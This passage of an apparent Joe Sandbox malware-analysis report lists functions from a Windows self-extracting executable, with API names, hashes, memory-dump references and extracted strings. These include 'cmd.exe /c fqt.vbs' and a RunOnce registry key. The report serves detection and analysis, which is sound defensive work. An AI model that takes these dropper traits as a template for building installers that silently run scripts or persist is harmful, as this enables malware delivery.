                                                                      • Instruction Fuzzy Hash: 1B512A32D08B8986E760AB50E85537EF6A0FB88795FC84136D74D466A4CF7CE446CF60
                                                                      Function 00007FF7D6FD2C54 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 84libraryloadershutdownCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Handle$AddressCloseExitModuleProcVersionWindows
                                                                      • String ID: @$HeapSetInformation$Kernel32.dll
                                                                      • API String ID: 1302179841-1204263913
                                                                      • Opcode ID: d0bfb26a70778e8c6dce021e27be85d7a0cec3bff586eb98b8bfca0f5ba54e91
                                                                      • Instruction ID: 441a4ed552914a33cd7f10f47f7c17426f10043f72b38001b3c8d1a4d3c91d9d
                                                                      • Opcode Fuzzy Hash: d0bfb26a70778e8c6dce021e27be85d7a0cec3bff586eb98b8bfca0f5ba54e91
                                                                      • Instruction Fuzzy Hash: E8311A21E08E4A86FA60BB60AC4127FF6A1AF55B50FCC4136DB0D03295CF3DF4468EA0
                                                                      Function 00007FF7D6FD204C Relevance: 12.1, APIs: 8, Instructions: 119filestringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                      • String ID:
                                                                      • API String ID: 836429354-0
                                                                      • Opcode ID: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
                                                                      • Instruction ID: 441144dc0ea39d5d1f23989336867bfa2006d9f543ea15198cd71480279835ed
                                                                      • Opcode Fuzzy Hash: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
                                                                      • Instruction Fuzzy Hash: 07517D31A08E8995EB11EF20D8142EEB7A1FB55B84FC88172DB5E03695CF3CE50ACB50
                                                                      Function 00007FF7D6FD3910 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 119threadwindowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
                                                                      • String ID: $cmd.exe /c fqt.vbs
                                                                      • API String ID: 2654313074-1747185477
                                                                      • Opcode ID: 00a4735194eecac90b7f23e95863fe14a5468c5ab709964e4691a7869e5d0189
                                                                      • Instruction ID: 2bb95a4d28f1c18a785b21f8475c938c902614eeae5a9bbb7e10b9854a96063d
                                                                      • Opcode Fuzzy Hash: 00a4735194eecac90b7f23e95863fe14a5468c5ab709964e4691a7869e5d0189
                                                                      • Instruction Fuzzy Hash: 37512222E08E4686E7106B55ED4427EEA61FB8AB55FC89232DB1D46794CF3CB4468F10
                                                                      Function 00007FF7D6FD61EC Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 97registryfileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                      • API String ID: 3049360512-3137473940
                                                                      • Opcode ID: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
                                                                      • Instruction ID: d6cefcfba1781015e677ffb20fa2996eff48ee3f17ab8422894a092f2f1804cd
                                                                      • Opcode Fuzzy Hash: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
                                                                      • Instruction Fuzzy Hash: 9D510A21E48E8A86EB10AB14EC543BEB7A5FB95745FCC5132CB4D46694CF2CF44ACB20
                                                                      Function 00007FF7D6FD2318 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75registryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: OpenQuery$CloseInfoValue
                                                                      • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                      • API String ID: 2209512893-559176071
                                                                      • Opcode ID: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
                                                                      • Instruction ID: 618aee8084fd7b4eea22015dba9a5275706a41ae21c39e73bc4988d218ef144d
                                                                      • Opcode Fuzzy Hash: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
                                                                      • Instruction Fuzzy Hash: 1E315C32A08F45CAD710AF64E8406AEF7A8FB99754FC84536EB8D43B58CF38E0518B50
                                                                      Function 00007FF7D6FD63B8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 71fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                      • String ID: IXP$IXP%03d.TMP
                                                                      • API String ID: 1082909758-3932986939
                                                                      • Opcode ID: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
                                                                      • Instruction ID: 1d41fe263991f0454e07e1d68081a8bc25d4e5d7ad2736411f412d9af218e24d
                                                                      • Opcode Fuzzy Hash: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
                                                                      • Instruction Fuzzy Hash: 72214A31E08D4586E610AB52AD503BEF691FB8EB85FC98132DE4E46795CF3CF446CA10
                                                                      Function 00007FF7D6FD8200 Relevance: 12.1, APIs: 8, Instructions: 136sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
                                                                      • String ID:
                                                                      • API String ID: 2995914023-0
                                                                      • Opcode ID: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
                                                                      • Instruction ID: a5be55e1518e8bbd6de821e2e34fead071d15ac5cf2f43e555c972cbe91deb59
                                                                      • Opcode Fuzzy Hash: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
                                                                      • Instruction Fuzzy Hash: 48513721E08E4A86E660AB61EC4137FA2A5BF54759FDC0532DB5D82294DF3CF8428E20
                                                                      Function 00007FF7D6FD60A4 Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 75memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00007FF7D6FD5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD5078
                                                                        • Part of subcall function 00007FF7D6FD5050: SizeofResource.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD5089
                                                                        • Part of subcall function 00007FF7D6FD5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD50AF
                                                                        • Part of subcall function 00007FF7D6FD5050: LoadResource.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD50C0
                                                                        • Part of subcall function 00007FF7D6FD5050: LockResource.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD50CF
                                                                        • Part of subcall function 00007FF7D6FD5050: memcpy_s.MSVCRT ref: 00007FF7D6FD50EE
                                                                        • Part of subcall function 00007FF7D6FD5050: FreeResource.KERNEL32(?,?,00000000,00007FF7D6FD2E43), ref: 00007FF7D6FD50FD
                                                                      • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF7D6FD3123), ref: 00007FF7D6FD60C9
                                                                      • LocalFree.KERNEL32 ref: 00007FF7D6FD6142
                                                                        • Part of subcall function 00007FF7D6FD4DCC: LoadStringA.USER32 ref: 00007FF7D6FD4E60
                                                                        • Part of subcall function 00007FF7D6FD4DCC: MessageBoxA.USER32 ref: 00007FF7D6FD4EA0
                                                                        • Part of subcall function 00007FF7D6FD7700: GetLastError.KERNEL32 ref: 00007FF7D6FD7704
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                      • String ID: $<None>$UPROMPT
                                                                      • API String ID: 957408736-2569542085
                                                                      • Opcode ID: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
                                                                      • Instruction ID: 33861128af8d5cc9703712d95d688767b4aab7c991fbfd2010d24953ef1a6c17
                                                                      • Opcode Fuzzy Hash: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
                                                                      • Instruction Fuzzy Hash: CF31A431E08A0A87E720AB60AD5037FF661EB99B84FC85136CB0E02695DF7CF0068F10
                                                                      Function 00007FF7D6FD5380 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 164filestringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile$lstrcmp
                                                                      • String ID: *MEMCAB
                                                                      • API String ID: 1301100335-3211172518
                                                                      • Opcode ID: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
                                                                      • Instruction ID: 1534ca97399f4aaedebc4932f3871b6777809af91917ff86ca7cedf3a546d56a
                                                                      • Opcode Fuzzy Hash: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
                                                                      • Instruction Fuzzy Hash: CA618562D08B4986F7619B19988137EBA91F755B69FC85336CB6D026C0CFBCB4468A20
                                                                      Function 00007FF7D6FD58B0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 152timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: FileTime$AttributesDateLocalTextWindow
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                      • API String ID: 1150793416-305352358
                                                                      • Opcode ID: 8ba837678c1f67d615ec5eef46cb77bfad3a32e48b5654526580d0bdf889563c
                                                                      • Instruction ID: bc4eb686fd5bebe30fb38ef2b104b8ef334a308691b7ff0656b3e5c2b8d5ba86
                                                                      • Opcode Fuzzy Hash: 8ba837678c1f67d615ec5eef46cb77bfad3a32e48b5654526580d0bdf889563c
                                                                      • Instruction Fuzzy Hash: 35516F72E2CE5A81EA50AB159C402BEA790FB49B50FCC5233DB4E46295CE7CF546CB60
                                                                      Function 00007FF7D6FD4C68 Relevance: 10.6, APIs: 7, Instructions: 100COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CapsDeviceRect$Release
                                                                      • String ID:
                                                                      • API String ID: 2212493051-0
                                                                      • Opcode ID: 0d796e944f2108898d7f7223ae91cc33082503468592f481f03ae45c8c0a45dc
                                                                      • Instruction ID: e31cd3b45bf38cb103f33f80ae05f35e6e285b4dde355f06d77754b7598584c5
                                                                      • Opcode Fuzzy Hash: 0d796e944f2108898d7f7223ae91cc33082503468592f481f03ae45c8c0a45dc
                                                                      • Instruction Fuzzy Hash: 66316132F149458AE7109BA5E8046BEBBA1F749B99FD99131CE0A53B48CF3CE4468F10
                                                                      Function 00007FF7D6FD6B70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: AllocLocal
                                                                      • String ID: TMP4351$.TMP
                                                                      • API String ID: 3494564517-2619824408
                                                                      • Opcode ID: 115a3f27e39781d027e0477db835a776448aec340d541b983af64270222d4fc0
                                                                      • Instruction ID: b00beb066f3a77a967cd2957bc63b2e722cdab1055413d45deccb893394056f4
                                                                      • Opcode Fuzzy Hash: 115a3f27e39781d027e0477db835a776448aec340d541b983af64270222d4fc0
                                                                      • Instruction Fuzzy Hash: F3313C21E08A4986E714AB65A81036FBA50EB95BA5FC85335EB6E077D5CF3CE4068F10
                                                                      Function 00007FF7D6FD5C60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *MEMCAB
                                                                      • API String ID: 0-3211172518
                                                                      • Opcode ID: 2085e244be9a75c0329170706bb6144b0415b504333b66df14c927118817c01a
                                                                      • Instruction ID: 23a4c300d7fb651c5f5484960f910f1b8ec341a02581c5a5a64d788101a55913
                                                                      • Opcode Fuzzy Hash: 2085e244be9a75c0329170706bb6144b0415b504333b66df14c927118817c01a
                                                                      • Instruction Fuzzy Hash: 2C313921E08F4A85EA10AB11E8483AEB7A5BB44791FD84237DA5C42290DFBCF446CB20
                                                                      Function 00007FF7D6FD7AC8 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                      • String ID:
                                                                      • API String ID: 1214682469-0
                                                                      • Opcode ID: 05ae3199707917ede6f93554733ac842423239086612fc629f4ab3851e21dd44
                                                                      • Instruction ID: 10ead2658565d641c1c82c3e1ace9a775ad8791d4b075d20951a4a2722d9aebc
                                                                      • Opcode Fuzzy Hash: 05ae3199707917ede6f93554733ac842423239086612fc629f4ab3851e21dd44
                                                                      • Instruction Fuzzy Hash: 96110031A08B4586EA109B11A84426EFA61FB59FE5FCC4635DF9D077D4DF3CE4428A14
                                                                      Function 00007FF7D6FD5690 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00007FF7D6FD3B40: MsgWaitForMultipleObjects.USER32(?,?,?,?,?,?,?,?,?,00000001,00007FF7D6FD3A09), ref: 00007FF7D6FD3B64
                                                                        • Part of subcall function 00007FF7D6FD3B40: PeekMessageA.USER32 ref: 00007FF7D6FD3B89
                                                                        • Part of subcall function 00007FF7D6FD3B40: PeekMessageA.USER32 ref: 00007FF7D6FD3BCD
                                                                      • WriteFile.KERNELBASE ref: 00007FF7D6FD56E4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                      • String ID:
                                                                      • API String ID: 1084409-0
                                                                      • Opcode ID: 98c152f8f55bf9a598385b6332d329f7c6a89d95a4b0cf9b0f7515c751b46731
                                                                      • Instruction ID: a9eeba62e43c1acb4a25f4cf88ba20630b4695726043412462815a4e122a9f99
                                                                      • Opcode Fuzzy Hash: 98c152f8f55bf9a598385b6332d329f7c6a89d95a4b0cf9b0f7515c751b46731
                                                                      • Instruction Fuzzy Hash: C9213D21E08A4A86E711AB15EC4473EE761BB85798FD88236DA6D466A4CF7CF406CF10
                                                                      Function 00007FF7D6FD51BC Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
                                                                      • String ID:
                                                                      • API String ID: 2018477427-0
                                                                      • Opcode ID: 2994afcc96e4644f858f991349daac6ec3ef4dc9132b2516fbef1fb9fafb314f
                                                                      • Instruction ID: 646b8cef15e95dc942452164f507a2ef49df6ae1ac8cef7666e55a0ff85c8234
                                                                      • Opcode Fuzzy Hash: 2994afcc96e4644f858f991349daac6ec3ef4dc9132b2516fbef1fb9fafb314f
                                                                      • Instruction Fuzzy Hash: B1118831D0CE4A82E6506B50AD8437FA691EB5674DFDC4232CB5C066A0CFBDF48A8B10
                                                                      Function 00007FF7D6FD7BA8 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1755709093.00007FF7D6FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D6FD0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1755691110.00007FF7D6FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755725022.00007FF7D6FD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755740539.00007FF7D6FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1755756796.00007FF7D6FDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff7d6fd0000_sRMytgfRpJ.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrev
